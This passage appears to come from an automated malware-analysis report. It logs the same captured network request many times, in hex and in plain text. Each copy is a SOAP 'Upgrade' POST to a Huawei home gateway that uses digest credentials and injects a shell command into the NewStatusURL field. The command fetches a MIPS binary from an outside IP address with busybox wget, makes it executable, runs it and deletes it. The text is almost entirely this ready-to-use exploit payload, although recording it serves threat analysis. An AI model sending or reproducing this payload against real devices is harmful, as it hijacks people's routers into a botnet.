/tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo 